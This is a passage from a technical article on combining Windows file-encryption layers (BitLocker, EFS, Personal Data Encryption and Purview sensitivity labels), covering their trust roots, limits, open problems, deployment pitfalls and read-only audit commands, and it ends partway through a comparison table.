&lt;p&gt;For per-file application use, the WinRT API is &lt;code&gt;Windows.Security.DataProtection.UserDataProtectionManager.ProtectStorageItemAsync&lt;/code&gt; [@ms-userdataprotectionmgr]. The class provides static methods to obtain an instance for the current or a provided user, and instance methods that include &lt;code&gt;GetStorageItemProtectionInfoAsync&lt;/code&gt;, &lt;code&gt;ProtectBufferAsync&lt;/code&gt;, &lt;code&gt;ProtectStorageItemAsync&lt;/code&gt;, &lt;code&gt;TryGetDefault&lt;/code&gt;, &lt;code&gt;TryGetForUser&lt;/code&gt;, and &lt;code&gt;UnprotectBufferAsync&lt;/code&gt;, along with the &lt;code&gt;DataAvailabilityStateChanged&lt;/code&gt; event [@ms-userdataprotectionmgr].The &lt;code&gt;UserDataProtectionManager&lt;/code&gt; API was introduced in Windows 10 1903 (build 10.0.18362), under &lt;code&gt;Windows.Foundation.UniversalApiContract&lt;/code&gt; v8.0 -- predating the 22H2 ship of PDE itself by three years.&lt;/p&gt;
&lt;p&gt;The gotchas list is long enough that the PDE FAQ enumerates each one:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;em&gt;Password sign-in fails&lt;/em&gt;. Hello-only release; a user who signs in with a password (e.g., via Ctrl-Alt-Del fallback after a Hello failure) cannot read PDE content.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;RDP fails&lt;/em&gt;. Microsoft Learn states it explicitly: &lt;em&gt;&quot;No, it&apos;s not supported to access protected content over RDP&quot;&lt;/em&gt; [@ms-pde-faq].&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Other-user fails&lt;/em&gt;. Each user&apos;s PDE content is bound to their own Hello credential.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Mutually exclusive with EFS&lt;/em&gt;. PDE and EFS are mutually exclusive on the same file (see §3).&lt;/li&gt;
&lt;li&gt;&lt;em&gt;OneDrive sync sees plaintext&lt;/em&gt;. &lt;em&gt;&quot;Personal Data Encryption&apos;s encryption only applies to local data saved to the disk. Applications accessing the files, including OneDrive when it syncs data, get cleartext data&quot;&lt;/em&gt; [@ms-pde-faq]. This is the price of &quot;transparent decryption&quot; for the calling user&apos;s processes.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Memory dumps can expose keys&lt;/em&gt;. &lt;em&gt;&quot;Kernel-mode crash dumps and live dumps can potentially cause the keys used by Personal Data Encryption to protect content to be exposed&quot;&lt;/em&gt; / &lt;em&gt;&quot;Hibernation files can potentially cause the keys used by Personal Data Encryption to protect content to be exposed&quot;&lt;/em&gt; [@ms-pde-configure].&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; EFS has a Data Recovery Agent model. BitLocker has recovery-key escrow (to Microsoft account, to Active Directory, to Microsoft Entra ID, to a printout). Purview has tenant-key escrow plus a super-user role. PDE has &lt;em&gt;none&lt;/em&gt; of these. The PDE FAQ is explicit: OneDrive is recommended as a &quot;second copy&quot;, not as a key-recovery mechanism, and &lt;em&gt;&quot;Personal Data Encryption doesn&apos;t have a requirement for a backup provider, including OneDrive in Microsoft 365. However, backups are recommended in case the keys used by Personal Data Encryption to protect files are lost&quot;&lt;/em&gt; [@ms-pde-faq]. Plan for this before deploying PDE at scale.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Microsoft Purview Information Protection in 2026&lt;/h3&gt;
&lt;p&gt;Purview&apos;s labelling and encryption story is the most operationally distinct of the four, because the encryption is enforced by a cloud service. Microsoft Learn enumerates the four guarantees the engine makes for a label-encrypted file:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;em&gt;&quot;Can be decrypted only by users authorized by the label&apos;s encryption settings&quot;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&quot;Remains encrypted no matter where it resides, inside or outside your organization, even if the file&apos;s renamed&quot;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&quot;Is encrypted both at rest (for example, in a OneDrive account) and in transit (for example, email as it traverses the internet)&quot;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;Encryption is applied automatically by the chosen label settings [@ms-purview-labels].&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Where the tenant root key sits is configurable:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;em&gt;Microsoft-managed by default&lt;/em&gt;. The root key is generated and held by Microsoft in Azure. This is the default for most tenants and the lowest-friction option.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;BYOK&lt;/em&gt;. The customer generates the root key (typically in a Thales HSM or equivalent), uploads it to an Azure Key Vault under their control, and Azure RMS uses the customer&apos;s Azure-held key as the tenant root [@ms-byok].&lt;/li&gt;
&lt;li&gt;&lt;em&gt;DKE&lt;/em&gt;. Two keys, one held by Microsoft and one held on-premises by the customer, both required for decryption [@ms-dke]. The DKE path narrows what Microsoft can do for the customer in exchange for the strongest possible client-side root.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Microsoft Learn frames DKE as a high-end option: &lt;em&gt;&quot;Highly sensitive (about 5% of data)&quot;&lt;/em&gt; is the documentation&apos;s own scoping language [@ms-dke]. The page makes the trade-off candid: &lt;em&gt;&quot;DKE encrypted data isn&apos;t accessible at rest to Microsoft 365 services including Copilot&quot;&lt;/em&gt; [@ms-dke]. DKE is the &quot;crown jewels&quot; tier; using it for everything would blind every Microsoft 365 server-side service from search to Copilot to compliance.&lt;/p&gt;
&lt;p&gt;Labels are applied to documents in three ways:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;em&gt;Manually&lt;/em&gt;, by users in Office desktop, Office on the web, or Outlook, via the Sensitivity menu.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Automatically&lt;/em&gt;, when a Purview auto-labelling policy matches a trainable classifier or content-inspection rule.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;On the wire&lt;/em&gt;, via Exchange transport rules that label messages as they leave the organisation.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Once applied, the label&apos;s encryption settings (if any) determine which authorised principals can request a use license. Microsoft Learn states the cross-organisation default: &lt;em&gt;&quot;By default, collaboration with other organizations that already have a Microsoft 365 or a Microsoft Entra directory is automatically supported&quot;&lt;/em&gt; [@ms-azure-rms]. The travels-with-file guarantee is enforced precisely because the file&apos;s wire format embeds the wrapped CEK and the policy reference: a recipient who has the file but cannot obtain a use license from Azure RMS holds ciphertext.&lt;/p&gt;
&lt;p&gt;Those are the layers you compose. But the practitioner reasonably asks: what about everything else? What about WIP, macOS, Linux, third-party DRM?&lt;/p&gt;
&lt;h2&gt;7. Competing Approaches Within and Beyond Windows&lt;/h2&gt;
&lt;p&gt;Four within-Windows alternatives and three cross-platform alternatives the reader will ask about. Two of them are dead ends.&lt;/p&gt;
&lt;h3&gt;Group Policy plus NTFS ACLs&lt;/h3&gt;
&lt;p&gt;NTFS ACLs are not encryption. They are OS-enforced access control: the kernel checks the ACL before satisfying a &lt;code&gt;ReadFile&lt;/code&gt;. Boot a different operating system that does not honour NTFS ACLs and the protection is gone. EFS exists because ACLs alone are not enough; nothing in this article displaces ACLs, but ACLs alone do not appear on any of the four roots above.&lt;/p&gt;
&lt;h3&gt;BitLocker To Go&lt;/h3&gt;
&lt;p&gt;BitLocker To Go is BitLocker for removable media -- USB sticks, external drives. It uses the same XTS-AES cipher and the same VMK/FVEK topology, with the recovery key delivered to Active Directory, Entra ID, a Microsoft account, or a printout depending on the policy [@wikipedia-bitlocker]. Treat it as the same Generation 2 root as BitLocker proper, restricted to removable storage.&lt;/p&gt;
&lt;h3&gt;Windows Information Protection -- the dead branch&lt;/h3&gt;
&lt;p&gt;Already named in §4. Microsoft Learn&apos;s &lt;code&gt;/previous-versions/&lt;/code&gt; page is the canonical citation for the deprecation [@ms-wip-deprecation]. The same page is candid about why WIP did not survive: &lt;em&gt;&quot;While Windows Information Protection can stop accidental data leaks from honest employees, it is not intended to stop malicious insiders from removing enterprise data&quot;&lt;/em&gt; [@ms-wip-deprecation]. The honest-employees framing is the most precise statement of WIP&apos;s threat model -- and of its limit. The recommended replacement is the Microsoft Purview Information Protection plus Microsoft Purview Data Loss Prevention combination. Do not deploy WIP in 2026.&lt;/p&gt;
&lt;h3&gt;macOS FileVault 2&lt;/h3&gt;
&lt;p&gt;Apple Platform Security documents the cipher and the key location succinctly: &lt;em&gt;&quot;FileVault uses the AES-XTS data encryption algorithm to protect full volumes on internal and removable storage devices&quot;&lt;/em&gt; and &lt;em&gt;&quot;All FileVault key handling occurs in the Secure Enclave; encryption keys are never directly exposed to the CPU&quot;&lt;/em&gt; [@apple-filevault]. Architecturally, FileVault 2 is BitLocker&apos;s analogue: volume-level, hardware-rooted, automatic at boot. There is no per-file user-bound layer in macOS that maps cleanly to PDE or EFS. The cross-platform reader looking for a PDE analogue on macOS will not find one in the OS itself; the equivalent has to come from per-application sandboxing (the Data Vault APIs, the App Sandbox container) or from Purview labels applied via Office for Mac.&lt;/p&gt;
&lt;h3&gt;Linux LUKS and fscrypt&lt;/h3&gt;
&lt;p&gt;LUKS is volume-level full-disk encryption, analogous to BitLocker. fscrypt is per-directory file encryption on ext4, F2FS, UBIFS, and CephFS; the kernel documentation states the supported filesystems explicitly: &lt;em&gt;&quot;currently ext4, F2FS, UBIFS, and CephFS&quot;&lt;/em&gt; [@fscrypt-kernel]. Architecturally, fscrypt is closer to PDE than to EFS: per-directory keying, key wrapping by a user-bound credential, designed so that different files can have different keys. The kernel docs also state the bound that matters most for our purposes: &lt;em&gt;&quot;Unlike dm-crypt, fscrypt operates at the filesystem level rather than at the block device level. This allows it to encrypt different files with different keys&quot;&lt;/em&gt; [@fscrypt-kernel]. The Linux stack has had a PDE-shaped tool for years; what it does not have is Hello-equivalent identity infrastructure baked in.&lt;/p&gt;
&lt;h3&gt;Third-party DRM&lt;/h3&gt;
&lt;p&gt;Commercial information-rights-management products from various vendors occupy roughly the same architectural slot as Purview labels: per-content envelope encryption, policy enforced at the rendering application against an identity service. The trade-offs differ on tenant ownership, identity binding, and Office integration; the architectural shape is the same.&lt;/p&gt;
&lt;p&gt;Those are the alternatives. None of them changes the fact that on Windows, the three above-BitLocker layers we have catalogued are the layers you actually pick from. So how far can those layers actually go? What is the theoretical ceiling?&lt;/p&gt;
&lt;h2&gt;8. Where Cryptography Ends and Trust Begins&lt;/h2&gt;
&lt;p&gt;Three bounds. Each is structural. Each tells you something about where cryptography unavoidably terminates.&lt;/p&gt;
&lt;h3&gt;Bound 1 -- At-rest encryption cannot protect plaintext in use&lt;/h3&gt;
&lt;p&gt;Every layer this article catalogues encrypts data &lt;em&gt;at rest&lt;/em&gt;. None of them encrypts data while it is in use by the application that opened it. The plaintext must materialise in process address space for the application to read it; once it is there, the same operating system that handed the application the plaintext also exposes that address space to debuggers, to dump-on-crash, to memory-scrapers, to anything with &lt;code&gt;PROCESS_VM_READ&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The Linux fscrypt kernel documentation states this property explicitly:&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&quot;After an encryption key has been added, fscrypt does not hide the plaintext file contents or filenames from other users on the same system. Instead, existing access control mechanisms such as file mode bits, POSIX ACLs, LSMs, or namespaces should be used for this purpose.&quot;&lt;/em&gt; [@fscrypt-kernel]&lt;/p&gt;
&lt;p&gt;The same property holds for BitLocker, EFS, PDE, and Purview labels. Once unlocked, the bytes are bytes. The protection against &quot;another process running as the same user&quot; is the operating system&apos;s access-control layer, not the encryption.&lt;/p&gt;
&lt;h3&gt;Bound 2 -- Authorised-reader exfiltration is unbounded&lt;/h3&gt;
&lt;p&gt;A user who is &lt;em&gt;authorised&lt;/em&gt; to view a file can do anything with the displayed pixels. They can screen-capture, photograph the screen with a phone, dictate the contents aloud, retype them into an unprotected document, paste them into Notepad. This is the &quot;rendezvous problem&quot;, or in older folk vocabulary the &quot;analog hole&quot;.Both &quot;rendezvous problem&quot; and &quot;analog hole&quot; are folk-knowledge terms used descriptively in industry; they are not citations to a named published conjecture, and we do not assert that any particular paper coined either. No cipher can prevent it, because the cipher&apos;s correctness requires that the authorised viewer &lt;em&gt;can&lt;/em&gt; read the plaintext.&lt;/p&gt;
&lt;p&gt;Microsoft itself is candid about where this leaves the RMS family of technologies. The Wikipedia AD RMS article quotes Microsoft&apos;s policy-enforcement framing:&lt;/p&gt;

the differentiation between different usage rights for authorized users is considered part of its policy enforcement capabilities, which Microsoft claims to be implemented as &apos;best effort&apos;, so it is not considered by Microsoft to be a security issue but a policy enforcement limitation. [@wikipedia-adrms]
&lt;p&gt;The &quot;do not print&quot; rights bit on an RMS document is not cryptographically enforced. It is enforced by Microsoft Word, by Outlook, by the rendering applications that the use license names. A user who controls the rendering application can ignore the bit. The cipher protects against &lt;em&gt;unauthorised&lt;/em&gt; readers; it cannot constrain &lt;em&gt;authorised&lt;/em&gt; readers.&lt;/p&gt;
&lt;h3&gt;Bound 3 -- The key-binding root limits the protection ceiling&lt;/h3&gt;
&lt;p&gt;The third bound is the cleanest restatement of the article&apos;s thesis. No layer can be stronger than its root.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;em&gt;EFS&lt;/em&gt;. The root is the user&apos;s logon secret, via classic DPAPI. The Wikipedia EFS article states the ceiling: &lt;em&gt;&quot;In Windows 2000, XP or later, the user&apos;s RSA private key is encrypted using a hash of the user&apos;s NTLM password hash plus the user name ... any compromise of the user&apos;s password automatically leads to access to that data&quot;&lt;/em&gt; [@wikipedia-efs]. EFS cannot be stronger than the user&apos;s password hygiene.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;PDE&lt;/em&gt;. The root is Windows Hello for Business. PDE cannot be stronger than Hello&apos;s own ceiling: TPM-bound asymmetric keys plus user PIN or biometric, with all the assumptions about anti-hammering, TPM attestation, and ARSO-off that the PDE configure page enumerates [@ms-pde-configure].&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Purview labels&lt;/em&gt;. The root is the Azure Rights Management tenant key, plus Microsoft Entra ID for authorization. The ceiling is Azure Key Vault custodial security plus Entra authorization correctness. DKE raises the ceiling by adding a customer-held key in series with the Azure-held key [@ms-dke], at the cost of blinding Microsoft 365 service-side processing of that content [@ms-dke].&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;None of the three roots is unconditionally stronger than the others. Each makes a trade-off that is sensible for the threat model it addresses. EFS optimises for &quot;this exact user account, this exact machine, after both have signed on.&quot; PDE optimises for &quot;this Hello-authenticated user, this exact device, even across boot-and-lock.&quot; Purview labels optimise for &quot;this Entra-authenticated user, across organisations, across protocols, across time.&quot; There is no fourth option that is simply &quot;stronger.&quot; There is only the choice of &lt;em&gt;which&lt;/em&gt; root the data is bound to, made deliberately.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Cryptography pushes the trust boundary up but cannot eliminate it. Every layer terminates at &quot;the application has the plaintext and the application can do anything.&quot; What changes between layers is &lt;em&gt;where&lt;/em&gt; that boundary sits, not whether it exists.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Capability&lt;/th&gt;
&lt;th&gt;Theoretically impossible&lt;/th&gt;
&lt;th&gt;Current best on Windows&lt;/th&gt;
&lt;th&gt;Remaining gap&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Per-process gating&lt;/td&gt;
&lt;td&gt;No (with attestation, e.g., LSAIso)&lt;/td&gt;
&lt;td&gt;Credential Guard / LSAIso for credentials; not extended to user files&lt;/td&gt;
&lt;td&gt;No file-encryption layer gates at app identity&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Authorised-reader exfiltration&lt;/td&gt;
&lt;td&gt;Yes (analog hole)&lt;/td&gt;
&lt;td&gt;RMS &quot;best effort&quot; policy enforcement [@wikipedia-adrms]&lt;/td&gt;
&lt;td&gt;Cannot be closed by cipher; closed only by hardware DRM / endpoint controls&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Pre-logon file protection&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;PDE L1 [@ms-pde-announcement]&lt;/td&gt;
&lt;td&gt;Limited to known folders, Hello, Entra-join, 24H2+&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cross-tenant per-content protection&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Purview labels via Azure RMS [@ms-purview-labels]&lt;/td&gt;
&lt;td&gt;Cross-tenant policy and revocation are per-tenant&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Those are the structural limits. The operational limits -- the things Microsoft has not yet shipped a fix for -- are different. Let&apos;s look at those next.&lt;/p&gt;
&lt;h2&gt;9. Open Problems Microsoft Has Not Yet Shipped&lt;/h2&gt;
&lt;p&gt;Seven live operational problems. None of them is academic. Each is a question your CISO is asking, and none of them has a Microsoft-shipped answer as of May 2026.&lt;/p&gt;
&lt;h3&gt;1. PDE has no DRA-equivalent&lt;/h3&gt;
&lt;p&gt;EFS has a Data Recovery Agent. BitLocker has recovery-key escrow to Active Directory, Entra ID, a Microsoft account, or a printout. Purview has tenant-key escrow and a super-user role. PDE has none of these. The PDE FAQ does not equivocate: &lt;em&gt;&quot;Personal Data Encryption doesn&apos;t have a requirement for a backup provider, including OneDrive in Microsoft 365. However, backups are recommended in case the keys used by Personal Data Encryption to protect files are lost&quot;&lt;/em&gt; [@ms-pde-faq]. &quot;Backups&quot; here means a second copy of the plaintext, made before the keys were lost; it is not key recovery. A user whose Hello credential is irrecoverably reset, and who had no second copy at the time, has unreadable files.&lt;/p&gt;
&lt;h3&gt;2. EFS in an Entra-only world&lt;/h3&gt;
&lt;p&gt;The DRA story works because Group Policy in a classic Active Directory deployment can push a recovery-agent certificate to every machine. In an Entra-joined-only environment, there is no equivalent shipped configuration. The EFS Win32 reference still documents EFS [@ms-efs-win32]; what it does not document is &quot;how to maintain an organisational EFS DRA on a fleet of Entra-joined-only devices in 2026.&quot; The migration path -- whether the answer is &quot;stop using EFS for new files and move to PDE&quot; (which the PDE FAQ implies [@ms-pde-faq]) or &quot;configure DRA via Intune&quot; (which is not a documented Intune-shipped flow) -- is not in Microsoft Learn.&lt;/p&gt;
&lt;h3&gt;3. Cross-tenant sensitivity-label collaboration&lt;/h3&gt;
&lt;p&gt;Cross-organisation sharing of Purview-encrypted content works for documents emailed or shared with a recipient whose tenant is configured to accept the policy [@ms-azure-rms]. Cross-organisation revocation is harder. A use license issued to an external recipient is bound to the issuing tenant&apos;s RMS service; revoking the recipient&apos;s access requires the issuing tenant to act, not the recipient&apos;s. Cross-tenant collaboration policies need explicit configuration, and revocation is per-tenant, not per-policy [@ms-purview-labels]. CISOs running federation-heavy programmes ask about this every week; the answer is &quot;configure explicitly, audit explicitly, accept that the recipient tenant has its own controls.&quot;&lt;/p&gt;
&lt;h3&gt;4. PDE composition with Windows Recall&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://paragmali.com/blog/microsoft-recall-2024-2026-re-architecture/&quot; rel=&quot;noopener&quot;&gt;Windows Recall&lt;/a&gt; (the AI-driven on-device timeline of screenshots and OCR text, shipping under Copilot+ PC programmes) introduces a new question for PDE: when Recall captures a screenshot of a PDE-protected document open on screen, does the resulting Recall snapshot inherit PDE protection, or is it merely VBS-enclave-protected? Microsoft&apos;s Recall documentation describes the VBS-enclave protection model and a separate set of opt-outs for &quot;sensitive content&quot;; what is &lt;em&gt;not&lt;/em&gt; documented is whether a Recall snapshot of a PDE-protected file is itself a PDE-protected file. This is a live design question.&lt;/p&gt;
&lt;h3&gt;5. DPAPI-NG protector revocation at Hello rotation&lt;/h3&gt;
&lt;p&gt;If a user enrols a new device into Entra ID, the Hello credential on that new device is a different credential -- a fresh asymmetric key in the new device&apos;s TPM, attested at a fresh enrolment event. PDE files encrypted under the &lt;em&gt;old&lt;/em&gt; device&apos;s Hello protector cannot be unwrapped on the new device, unless a recovery mechanism re-issues the wrap. There is no shipped recovery mechanism (see problem 1 above), so the question is operational: what does the user do with PDE files synced via OneDrive -- which sees plaintext, per the PDE FAQ [@ms-pde-faq] -- when they move to a new device? The answer is &quot;OneDrive re-encrypts them under the new device&apos;s Hello on first access, because OneDrive saw plaintext.&quot; That works, and it tells you something about how thin PDE&apos;s &quot;encryption that travels&quot; story is.&lt;/p&gt;
&lt;h3&gt;6. Per-process cryptographic gating&lt;/h3&gt;
&lt;p&gt;None of the four layers gates at the &lt;em&gt;application&lt;/em&gt; identity. EFS, PDE, Purview labels all release plaintext to any process running as the authorised user (or any process holding a valid use license, in Purview&apos;s case). The CISO question that has no answer in the file-encryption stack today is &lt;em&gt;&quot;can I keep ransomware running as Alice from encrypting Alice&apos;s labelled files?&quot;&lt;/em&gt; Credential Guard and LSAIso show that per-process gating with attestation is technically feasible for credentials; nothing in the file-encryption layers extends that mechanism to user files. This is the single most asked open question in the working-architect audience.&lt;/p&gt;
&lt;h3&gt;7. Cipher-mode modernisation&lt;/h3&gt;
&lt;p&gt;PDE&apos;s choice of AES-CBC is deliberate, but it is also old. AEAD modes -- GCM, OCB3, ChaCha20-Poly1305 -- bundle integrity and confidentiality together; CBC does not. PDE composed with BitLocker XTS-AES is acceptable in practice [@wikipedia-bitlocker], but the PDE layer in isolation has no integrity guarantee. Whether Microsoft will modernise the PDE cipher in a future Windows release (and what the file-format compatibility story would look like if they did) is unanswered as of May 2026.&lt;/p&gt;
&lt;p&gt;Those are the open problems. The article&apos;s last sections turn from research into action: how does a working architect actually use these layers?&lt;/p&gt;
&lt;h2&gt;10. Composing the Layers: A Practical Guide&lt;/h2&gt;
&lt;p&gt;A decision tree. Then the common implementation pitfalls. Then an audit checklist for the layered architecture you should be aiming for.&lt;/p&gt;
&lt;h3&gt;The decision tree&lt;/h3&gt;

flowchart TD
    H[NTFS on hardware]
    BL[BitLocker XTS-AES, TPM+PIN protector]
    PDE_KF[PDE known folders: Desktop, Documents, Pictures]
    EFS_Legacy[EFS legacy files only, no new EFS]
    Purview[Purview sensitivity labels with encryption]
    Apps[Office, Outlook, OneDrive sync clients]
    H --&amp;gt; BL
    BL --&amp;gt; PDE_KF
    BL --&amp;gt; EFS_Legacy
    PDE_KF --&amp;gt; Apps
    EFS_Legacy --&amp;gt; Apps
    Purview --&amp;gt; Apps
&lt;p&gt;The decision tree, walked once:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;em&gt;Need to protect the volume at rest, against a powered-off-device thief?&lt;/em&gt; BitLocker. Configure TPM+PIN protector to close the post-boot pre-logon gap at the boot layer where you can.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Need to protect per-user on a shared device, including the post-boot pre-logon window?&lt;/em&gt; PDE, on Windows 11 22H2 or later, with Entra-join, Hello, ARSO disabled. For Windows 11 24H2, prefer the known-folder mode (Desktop, Documents, Pictures auto-encrypted).&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Have legacy &lt;code&gt;$EFS&lt;/code&gt; files inherited from a previous Windows generation?&lt;/em&gt; Leave EFS for those legacy files; do not encrypt new files with EFS on devices that can run PDE. Choose PDE or EFS per file, not both (mutual exclusion; §3).&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Need protection that travels with the file across machines, tenants, and protocols?&lt;/em&gt; Purview sensitivity labels with encryption settings. Use Microsoft-managed tenant keys by default; BYOK for tenants that need customer-controlled keys; DKE for the ~5% of crown-jewel content where Microsoft 365 service-side processing must be blinded [@ms-dke].&lt;/li&gt;
&lt;li&gt;&lt;em&gt;All of the above, on the same file, on a modern Entra-joined Windows 11 24H2 Enterprise device?&lt;/em&gt; Yes. BitLocker + PDE-known-folders + Purview label is the modern default. EFS is the legacy slot.&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; For most Entra-joined Windows 11 24H2 deployments: BitLocker (TPM+PIN) under PDE (known-folder mode) under Purview sensitivity labels. EFS legacy only. The three above-BitLocker layers compose; the four roots stay distinct; the threat coverage adds up. Nothing in this composition needs DKE -- save DKE for the ~5% of content where Copilot blinding is desired.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Common implementation pitfalls&lt;/h3&gt;
&lt;p&gt;Seven pitfalls, in order from &quot;easy to miss&quot; to &quot;easy to misdiagnose.&quot;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;em&gt;Forgetting to disable ARSO before enabling PDE&lt;/em&gt;. Microsoft Learn states the constraint twice: &lt;em&gt;&quot;Automatic Restart Sign On (ARSO) must be disabled&quot;&lt;/em&gt; [@ms-pde-overview] and &lt;em&gt;&quot;To use Personal Data Encryption, ARSO must be disabled&quot;&lt;/em&gt; [@ms-pde-configure]. Enabling &lt;code&gt;EnablePersonalDataEncryption=1&lt;/code&gt; while ARSO is still on does not produce a clean error.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Expecting &lt;code&gt;EnablePersonalDataEncryption=1&lt;/code&gt; to migrate existing files&lt;/em&gt;. It does not. The CSP value enables the API surface (and, on 24H2, the known-folder protection). Files that existed before PDE was enabled are not automatically wrapped. Plan a separate migration pass.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Letting kernel-mode crash dumps or hibernation expose PDE keys&lt;/em&gt;. Microsoft&apos;s PDE configure page is explicit: &lt;em&gt;&quot;Kernel-mode crash dumps and live dumps can potentially cause the keys used by Personal Data Encryption to protect content to be exposed&quot;&lt;/em&gt; and &lt;em&gt;&quot;Hibernation files can potentially cause the keys used by Personal Data Encryption to protect content to be exposed&quot;&lt;/em&gt; [@ms-pde-configure]. Configure dump policy alongside PDE; do not deploy PDE on devices that produce kernel-mode dumps to untrusted destinations.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Assuming OneDrive sync preserves PDE protection in the cloud&lt;/em&gt;. It does not. The PDE FAQ states it plainly: &lt;em&gt;&quot;Personal Data Encryption&apos;s encryption only applies to local data saved to the disk. Applications accessing the files, including OneDrive when it syncs data, get cleartext data&quot;&lt;/em&gt; [@ms-pde-faq]. Cloud-side protection is the labelling layer&apos;s job, not PDE&apos;s.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Deploying DKE everywhere&lt;/em&gt;. DKE breaks Microsoft 365 server-side service integration -- search, eDiscovery, transport rules, Copilot -- because Microsoft cannot decrypt content at rest. Microsoft Learn says it: &lt;em&gt;&quot;DKE encrypted data isn&apos;t accessible at rest to Microsoft 365 services including Copilot&quot;&lt;/em&gt; [@ms-dke]. DKE is for the ~5% of content explicitly scoped that way; deploying it more broadly produces a tenant where every server-side feature degrades.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Trying to use PDE over RDP&lt;/em&gt;. &lt;em&gt;&quot;No, it&apos;s not supported to access protected content over RDP&quot;&lt;/em&gt; [@ms-pde-faq]. PDE binds to local Hello sign-in; a remote desktop session is not that.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Treating EFS as a current-generation solution on new devices&lt;/em&gt;. The Microsoft replacement for new per-file scenarios is PDE [@ms-pde-faq]. Leaving EFS in place for legacy files is fine; encrypting new files with EFS on a device that could run PDE is not the recommended path.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Audit checklist&lt;/h3&gt;
&lt;p&gt;Five commands and CSP queries that establish where each layer actually stands on a given device.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;em&gt;BitLocker&lt;/em&gt;. Run &lt;code&gt;manage-bde -status&lt;/code&gt; (PowerShell, elevated). Look at the protection status, encryption method (XTS-AES 128 or 256), and key protectors. A TPM+PIN protector closes the pre-logon gap at the volume layer.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;EFS&lt;/em&gt;. Run &lt;code&gt;cipher.exe /C &amp;lt;file&amp;gt;&lt;/code&gt; to inspect the EFS attribute on a given file -- it prints the user SIDs and DRA SIDs that hold wrappers. Run &lt;code&gt;cipher.exe /U /N&lt;/code&gt; to enumerate every encrypted file on the volume without changing anything. The output tells you whether legacy EFS state actually exists.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;PDE -- top-level enablement&lt;/em&gt;. Query the CSP node &lt;code&gt;./User/Vendor/MSFT/PDE/EnablePersonalDataEncryption&lt;/code&gt;. A value of 1 means the PDE API surface is on; 0 (or absent) means it is off [@ms-pde-csp].&lt;/li&gt;
&lt;li&gt;&lt;em&gt;PDE -- known folders&lt;/em&gt;. Query &lt;code&gt;./User/Vendor/MSFT/PDE/ProtectFolders/ProtectDesktop&lt;/code&gt;, &lt;code&gt;./User/Vendor/MSFT/PDE/ProtectFolders/ProtectDocuments&lt;/code&gt;, &lt;code&gt;./User/Vendor/MSFT/PDE/ProtectFolders/ProtectPictures&lt;/code&gt;. Note the &lt;code&gt;ProtectFolders&lt;/code&gt; parent node; the un-nested form will return nothing [@ms-pde-csp].&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Purview labels&lt;/em&gt;. From Exchange Online PowerShell (after &lt;code&gt;Connect-IPPSSession&lt;/code&gt;), &lt;code&gt;Get-Label&lt;/code&gt; enumerates the sensitivity labels published in the tenant, including their encryption settings.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The &quot;what BitLocker on its own buys you&quot; table closes the audit out:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Scenario&lt;/th&gt;
&lt;th&gt;BitLocker alone&lt;/th&gt;
&lt;th&gt;EFS adds&lt;/th&gt;
